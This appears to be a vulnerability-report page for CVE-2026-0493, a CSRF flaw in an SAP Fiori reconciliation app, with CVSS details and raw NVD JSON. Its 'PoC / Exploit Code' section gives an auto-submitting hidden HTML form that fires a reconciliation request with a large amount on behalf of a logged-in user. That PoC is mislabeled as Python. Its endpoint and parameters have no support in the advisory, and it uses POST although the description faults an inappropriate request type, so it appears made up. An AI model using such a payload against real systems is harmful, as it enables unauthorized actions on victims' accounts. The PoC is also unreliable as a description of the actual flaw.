Security Vulnerability Report
中文
CVE-2026-0493 CVSS 4.3 MEDIUM

CVE-2026-0493

Published: 2026-01-13 02:15:51
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Due to a Cross-Site Request Forgery (CSRF) vulnerability in SAP Fiori App Intercompany Balance Reconciliation an attacker could execute state?changing actions using an inappropriate request type, this deviation from expected request semantics may allow an attacker to trigger unintended actions on behalf of an authenticated user causing low impact on integrity of the system. This has no impact on confidentiality and availability.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

SAP Fiori App Intercompany Balance Reconciliation (FCI_RECONCILE) - 具体版本需参考SAP官方安全公告
SAP Fiori Front-End Server - 特定版本受影响

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2026-0493 --> <html> <body> <h1>CSRF Attack - SAP Fiori Intercompany Balance Reconciliation</h1> <p>This PoC demonstrates CSRF vulnerability in SAP Fiori App.</p> <form id="csrfForm" action="https://[SAP_HOST]/sap/bc/ui5_ui5/sap/FCI_RECONCILE/executeAction" method="POST" enctype="application/x-www-form-urlencoded"> <input type="hidden" name="action" value="executeReconciliation" /> <input type="hidden" name="companyCodeFrom" value="1000" /> <input type="hidden" name="companyCodeTo" value="2000" /> <input type="hidden" name="fiscalYear" value="2026" /> <input type="hidden" name="period" value="01" /> <input type="hidden" name="amount" value="999999.99" /> <input type="hidden" name="currency" value="USD" /> <input type="hidden" name="csrf_token" value="" /> </form> <script> document.getElementById('csrfForm').submit(); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0493", "sourceIdentifier": "[email protected]", "published": "2026-01-13T02:15:51.420", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Due to a Cross-Site Request Forgery (CSRF) vulnerability in SAP Fiori App Intercompany Balance Reconciliation an attacker could execute state?changing actions using an inappropriate request type, this deviation from expected request semantics may allow an attacker to trigger unintended actions on behalf of an authenticated user causing low impact on integrity of the system. This has no impact on confidentiality and availability."}, {"lang": "es", "value": "Debido a una vulnerabilidad de falsificación de petición en sitios cruzados (CSRF) en la aplicación SAP Fiori Intercompany Balance Reconciliation, un atacante podría ejecutar acciones que cambian el estado utilizando un tipo de petición inapropiado, esta desviación de la semántica de petición esperada podría permitir a un atacante desencadenar acciones no intencionadas en nombre de un usuario autenticado causando bajo impacto en la integridad del sistema. Esto no tiene impacto en la confidencialidad y disponibilidad."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://me.sap.com/notes/3655229", "source": "[email protected]"}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.